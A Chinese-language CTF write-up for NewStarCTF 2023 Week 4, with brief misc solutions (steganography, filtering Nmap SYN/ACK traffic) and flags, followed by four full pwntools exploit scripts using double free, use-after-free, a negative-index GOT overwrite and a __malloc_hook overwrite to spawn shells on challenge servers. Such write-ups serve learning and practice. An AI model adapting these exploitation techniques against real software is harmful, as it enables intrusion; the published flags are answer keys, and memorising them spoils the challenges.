#NewStarCTF 2023 Week4

啊啊啊啊好多事情啊,没什么时间做题

misc

R通大残

stegsolve查看:

image-20231023022604150

flag:flag{a96d2cc1-6edd-47fb-8e84-bd953205c9f5}

Nmap:

这题其实可以参考这篇文章:从一道题分析Nmap SYN/半连接/半开放扫描流量
TCP扫描确认端口开放的标志就是返回SYN+ACK的包,所以只需要过滤SYN、ACK状态都为1的包即可

1
tcp.flags.syn==1 and tcp.flags.ack==1

image-20231023102534013

flag{80,3306,5000,7000,8021,9000}

依旧是空白:

png图片修复宽高:

image-20231023023735097

得到密码加上有空白格,猜测是snow隐写

image-20231023023835558

flag:flag{2b29e3e0-5f44-402b-8ab3-35548d7a6a11}

pwn

Double

double free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
#context.terminal = ['tmux', 'splitw', '-h']
p=process('./double')
p=remote('node4.buuoj.cn',26923)
elf=ELF('./double')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

def add(index,context):
    sla('>\n',b'1')
    sla('Input idx\n',str(index))
    sa('Input content\n',context)

def free(index):
    sla('>\n',b'2')
    sla('Input idx\n',str(index))

add(0,b'a')
add(1,b'a')
add(2,b'a')
free(0)
free(1)
free(0)
add(3,p64(0x602070-0x10))

add(4,p64(0x666))
add(5,p64(0x666))
add(6,p64(0x666))
sl(b'3')
#add()

#gdb.attach(p)
#pause()

p.interactive()

game

myread能将换行符换成\x00

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux')
#context.terminal = ['tmux', 'splitw', '-h']
p=process('./game')
p=remote('node4.buuoj.cn',26026)
elf=ELF('./game')
libc=ELF('./libc-2.31.so')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)


sla('伙伴\n',b'1')
sla('套餐\n',b'2')
sl('/bin/sh\x00')

for i in range(3):
    sla('套餐\n',b'1')

sla('套餐\n',b'3')
sla('player!\n',str(0x2190))

#gdb.attach(p)
#pause()

p.interactive()

message_board

利用输入不是数字的符号泄露libc,然后利用下标可为负数覆盖exit的got地址为one_gadget即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
#context.terminal = ['tmux', 'splitw', '-h']
p=process('./message')
p=remote('node4.buuoj.cn',27582)
elf=ELF('./message')
libc=ELF('./libc-2.31.so')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

sla(' for us\n',b'2')
sl(b'100-')
ru('\n')
ru('Your suggestion is ')
libc_base=int(ru('\n')[:-1])-0x1ed5c0
success('libc_base:'+hex(libc_base))
put=libc_base+libc.symbols['puts']
success('put:'+hex(put))
sla('code\n',str(put))

one=[0xe3afe,0xe3b01,0xe3b04]
one_gadget=libc_base+one[1]
success('one_gadget:'+hex(one_gadget))
one_gadget1=one_gadget%0x100000000
one_gadget2=one_gadget>>32
success('one_gadget1:'+hex(one_gadget1))
success('one_gadget2:'+hex(one_gadget2))
sla('suggestions\n',b'-27')
sla('suggestion',str(one_gadget2))
sla('suggestions\n',b'-28')
sla('suggestion',str(one_gadget1))

#gdb.attach(p)
#pause()

p.interactive()

ezheap:

use after free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./ezheap')
p=remote('node4.buuoj.cn',29321)
elf=ELF('./ezheap')
libc=ELF('./libc.so.6')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

def add(index,size,context):
    sla('>>\n',b'1')
    sla('enter idx(0~15): \n',str(index))
    sla('enter size: \n',str(size))
    sla('write the note: ',context)

def show(index):
    sla('>>\n',b'3')
    sla('enter idx(0~15): \n',str(index))

def edit(index,context):
    sla('>>\n',b'4')
    sla('enter idx(0~15): \n',str(index))
    sa('enter content: \n',context)

def free(index):
    sla('>>\n',b'2')
    sla('enter idx(0~15): \n',str(index))

for i in range(1,5):
    add(i,0x80,b'aaa')

for i in range(1,4):
    free(i)

add(5,0x20,b'')
show(5)
heap=u64(ru('\n')[:-1].ljust(8,b'\x00'))
heap_base=heap-0x2a0
success('heap_base:'+hex(heap_base))


for i in range(7,15):
    add(i,0x50,b'/bin/sh\x00')

edit(5,p64(0x80)+p64(0)*2+p64(heap_base+0x2a0-0x8))
edit(2,p64(0x91))
for i in range(7):
    edit(5,p64(0x80)+p64(0)*2+p64(heap_base+0x600+0x90*i-0x8))
    edit(2,p64(0x91))
free(14)
for i in range(7,14):
    free(i)

edit(5,p64(0x80)+p64(0)*2+p64(heap_base+0x8c0+0x10))
show(2)
main_arena=get_libc()-96
libc_base=main_arena-0x1ecb80
success("libc_base:"+hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
libc_realloc=libc_base+libc.symbols['__libc_realloc']
realloc_hook=libc_base+libc.symbols['__realloc_hook']
one=[0xe3afe,0xe3b01,0xe3b04]
one_gadget=libc_base+one[1]

edit(5,p64(0x80)+p64(0)*2+p64(malloc_hook))
edit(2,p64(one_gadget))


sl(b'1')
sl(b'0')
#gdb.attach(p)
#pause()

p.interactive()